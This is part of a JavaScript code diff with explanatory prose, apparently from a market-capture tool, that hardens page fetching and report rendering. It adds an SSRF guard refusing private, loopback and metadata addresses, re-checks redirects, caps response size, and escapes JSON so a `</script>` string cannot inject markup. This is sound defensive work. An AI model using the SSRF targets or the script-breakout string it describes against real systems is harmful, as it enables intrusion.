+ const mapped = lower.match(/^::ffff:(.+)$/);
193
+ if (mapped) {
194
+ const rest = mapped[1];
195
+ if (rest.includes("."))
196
+ return ipv4IsPrivate(rest);
197
+ const groups = rest.split(":");
198
+ if (groups.length === 2) {
199
+ const hi = parseInt(groups[0], 16);
200
+ const lo = parseInt(groups[1], 16);
201
+ if (Number.isNaN(hi) || Number.isNaN(lo))
202
+ return true;
203
+ return ipv4IsPrivate(`${(hi >> 8) & 0xff}.${hi & 0xff}.${(lo >> 8) & 0xff}.${lo & 0xff}`);
204
+ }
205
+ return true; // unrecognized mapped form → refuse
206
+ }
207
+ if (lower.startsWith("fe8") || lower.startsWith("fe9") || lower.startsWith("fea") || lower.startsWith("feb"))
208
+ return true; // link-local fe80::/10
209
+ if (lower.startsWith("fc") || lower.startsWith("fd"))
210
+ return true; // unique-local fc00::/7
211
+ return false;
212
+ }
213
+ return true; // not a recognizable IP literal → refuse
214
+ }
215
+ export async function assertPublicUrl(rawUrl) {
216
+ let url;
217
+ try {
218
+ url = new URL(rawUrl);
219
+ }
220
+ catch {
221
+ throw new Error(`market capture: "${rawUrl}" is not a valid URL.`);
222
+ }
223
+ if (url.protocol !== "http:" && url.protocol !== "https:") {
224
+ throw new Error(`market capture refuses ${url.protocol} URLs (only http/https): ${rawUrl}`);
225
+ }
226
+ const host = url.hostname.replace(/^\[|\]$/g, ""); // strip IPv6 brackets
227
+ if (isIP(host)) {
228
+ if (ipIsPrivate(host))
229
+ throw new Error(`market capture refuses private/loopback address ${host} (SSRF guard).`);
230
+ return url;
231
+ }
232
+ // Hostname: resolve and refuse if ANY address is private.
233
+ const addrs = await lookup(host, { all: true });
234
+ for (const { address } of addrs) {
235
+ if (ipIsPrivate(address)) {
236
+ throw new Error(`market capture refuses ${host} — it resolves to private/internal address ${address} (SSRF guard).`);
237
+ }
238
+ }
239
+ return url;
240
+ }
144
241
  const defaultFetchPage = async (url) => {
145
- const response = await fetch(url, {
146
- headers: {
147
- "User-Agent": "fullstackgtm-market/0 (+https://github.com/fullstackgtm/core)",
148
- "Accept-Language": "en-US",
149
- },
150
- redirect: "follow",
151
- });
152
- return { status: response.status, body: await response.text() };
242
+ let current = url;
243
+ for (let hop = 0; hop <= MAX_REDIRECTS; hop++) {
244
+ await assertPublicUrl(current);
245
+ const controller = new AbortController();
246
+ const timer = setTimeout(() => controller.abort(), FETCH_TIMEOUT_MS);
247
+ let response;
248
+ try {
249
+ response = await fetch(current, {
250
+ headers: {
251
+ "User-Agent": "fullstackgtm-market/0 (+https://github.com/fullstackgtm/core)",
252
+ "Accept-Language": "en-US",
253
+ },
254
+ redirect: "manual",
255
+ signal: controller.signal,
256
+ });
257
+ }
258
+ finally {
259
+ clearTimeout(timer);
260
+ }
261
+ if (response.status >= 300 && response.status < 400 && response.headers.get("location")) {
262
+ current = new URL(response.headers.get("location"), current).toString();
263
+ continue; // re-validate the redirect target on the next iteration
264
+ }
265
+ const reader = response.body?.getReader();
266
+ if (!reader)
267
+ return { status: response.status, body: await response.text() };
268
+ const chunks = [];
269
+ let total = 0;
270
+ for (;;) {
271
+ const { done, value } = await reader.read();
272
+ if (done)
273
+ break;
274
+ total += value.length;
275
+ if (total > MAX_BODY_BYTES) {
276
+ await reader.cancel();
277
+ break;
278
+ }
279
+ chunks.push(value);
280
+ }
281
+ return { status: response.status, body: Buffer.concat(chunks).toString("utf8") };
282
+ }
283
+ throw new Error(`market capture: too many redirects (>${MAX_REDIRECTS}) for ${url}`);
153
284
  };
154
285
  export async function captureMarket(config, options = {}) {
155
286
  const dir = options.dir ?? join(marketHome(config.category), "captures");
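The hex branch of `ipIsPrivate` is easiest to follow with concrete values. An IPv4-mapped address such as `::ffff:7f00:1` packs the four IPv4 octets into two 16-bit groups, and the shifts and masks pull them back out. The helper name `unwrapMappedHex` is hypothetical; the arithmetic is the same as in the hunk above.

```javascript
// Convert the two trailing hex groups of an IPv4-mapped IPv6 address
// (for example "7f00:1" from "::ffff:7f00:1") into dotted-quad form.
function unwrapMappedHex(rest) {
  const [hi, lo] = rest.split(":").map((g) => parseInt(g, 16));
  return `${(hi >> 8) & 0xff}.${hi & 0xff}.${(lo >> 8) & 0xff}.${lo & 0xff}`;
}

console.log(unwrapMappedHex("7f00:1"));    // 127.0.0.1 (loopback)
console.log(unwrapMappedHex("a9fe:a9fe")); // 169.254.169.254 (metadata)
console.log(unwrapMappedHex("c0a8:101"));  // 192.168.1.1 (private)
```

Each of these unwraps to an address that `ipv4IsPrivate` refuses, so the mapped form cannot be used to sidestep the IPv4 checks.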
@@ -284,6 +415,11 @@ export function validateObservationSet(config, set) {
284
415
  if (!INTENSITY_RANK[obs.intensity] && obs.intensity !== "unobservable") {
285
416
  problems.push(`${cell}: invalid intensity "${obs.intensity}"`);
286
417
  }
418
+ // confidence is rendered into the HTML report; only the enum is allowed, so
419
+ // an `observe --from` file can't smuggle markup through a free-text value.
420
+ if (obs.confidence !== "high" && obs.confidence !== "medium" && obs.confidence !== "low") {
421
+ problems.push(`${cell}: invalid confidence "${String(obs.confidence)}" (expected high, medium, or low)`);
422
+ }
287
423
  if ((obs.intensity === "loud" || obs.intensity === "quiet") && obs.evidence.length === 0) {
288
424
  problems.push(`${cell}: ${obs.intensity} reading with no quoted evidence`);
289
425
  }
@@ -1,3 +1,12 @@
1
1
  import type { MarketConfig, ObservationSet } from "./market.ts";
2
+ /**
3
+ * Serialize JSON for embedding inside an inline <script> block. JSON.stringify
4
+ * does not escape `<`, `>`, `&`, or the U+2028/U+2029 line separators, so a
5
+ * vendor name containing `</script>` (these are untrusted, competitor-authored
6
+ * strings) would close the tag and inject markup. Replacing them with their
7
+ * \uXXXX escapes keeps the parsed value identical while making the breakout
8
+ * sequence unrepresentable in the HTML source.
9
+ */
10
+ export declare function safeJsonForScript(value: unknown): string;
2
11
  export declare function marketMapToMarkdown(config: MarketConfig, set: ObservationSet): string;
3
12
  export declare function marketMapToHtml(config: MarketConfig, set: ObservationSet): string;
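The doc comment on `safeJsonForScript` describes the technique but the function body is not part of this excerpt. The following is a minimal sketch of one way to do it, under the assumption that the five characters named in the comment are replaced with `\uXXXX` escapes after `JSON.stringify`; the shipped implementation may differ.

```javascript
// Hypothetical implementation matching the doc comment above; the shipped
// marketReport.js body is not shown in this diff.
function safeJsonForScript(value) {
  return JSON.stringify(value).replace(
    /[<>&\u2028\u2029]/g,
    (ch) => "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

const payload = { vendor: "</script><script>alert(1)</script>", note: "a & b" };
const embedded = safeJsonForScript(payload);

console.log(embedded.includes("</script>")); // false: no tag breakout possible
console.log(JSON.parse(embedded).vendor === payload.vendor); // true: value unchanged
```

The escapes are valid JSON string escapes, so the browser's `JSON.parse` recovers the original strings while the HTML parser never sees a literal `<` inside the data island.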